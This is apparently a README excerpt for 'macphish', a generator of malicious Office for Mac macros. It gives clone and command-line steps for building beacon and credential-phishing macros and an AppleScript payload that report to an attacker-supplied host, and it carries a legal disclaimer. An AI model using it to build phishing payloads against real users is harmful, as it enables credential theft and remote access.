The author does not hold any responsibility about the bad use of this script, remember that attacking targets without prior concent its ilegal and punish by the law, this script was build to show how resource files can automate tasks.
macphish is a Office for Mac Macro Payload Generator.
There are 4 attack vectors available:
+ For the ‘creds’ method, macphish can generate the Applescript script directly, in case you need to run it from a shell.
– Python 2.7.x and Mac-OS
git clone https://github.com/cldrn/macphish && cd macphish
./macphish.py -a beacon -lh <host>
To generate the macro:
./macphish.py -a creds -m -lh <host>
To generate the Applescript payload to be executed from a shell:
./macphish.py -a creds -lh <host>